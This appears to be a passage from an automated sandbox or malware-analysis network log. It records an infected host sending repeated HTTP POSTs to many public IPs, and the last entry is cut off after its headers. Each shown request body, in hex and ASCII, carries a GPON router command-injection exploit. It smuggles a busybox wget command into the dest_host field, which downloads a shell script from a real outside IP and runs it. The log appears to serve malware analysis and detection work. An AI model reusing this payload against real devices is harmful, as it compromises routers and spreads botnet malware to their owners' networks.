                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1884192.168.2.133924842.33.32.186443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.824935913 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1885192.168.2.13578585.64.152.175443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.824966908 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1886192.168.2.1348694109.182.54.145443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.824973106 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1887192.168.2.1342738109.192.150.61443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.824987888 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1888192.168.2.13372505.13.45.80443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.825002909 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1889192.168.2.134379042.233.106.165443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.825083971 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1890192.168.2.1334358109.17.70.196443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.825115919 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1891192.168.2.1341502212.207.85.201443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.825122118 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1892192.168.2.1342562118.230.208.6443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.825212002 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1893192.168.2.13545425.125.167.154443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.825217009 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1894192.168.2.1337498212.31.240.66443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.825251102 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1895192.168.2.13514785.114.118.133443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.825251102 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1896192.168.2.1356168109.28.133.51443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.825289011 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1897192.168.2.1354672109.10.214.15443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.825294018 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1898192.168.2.13346725.54.201.71443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.825335979 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1899192.168.2.1335664118.132.209.191443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.825359106 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1900192.168.2.13524845.33.70.212443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.825387001 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1901192.168.2.135809842.42.103.87443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.825442076 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1902192.168.2.1352994212.181.248.232443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.825443983 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1903192.168.2.135345042.154.223.103443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.825455904 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1904192.168.2.1338156118.125.114.198443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.825479031 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1905192.168.2.1333682118.234.81.249443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.825505018 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1906192.168.2.13555545.213.59.249443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.825551987 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
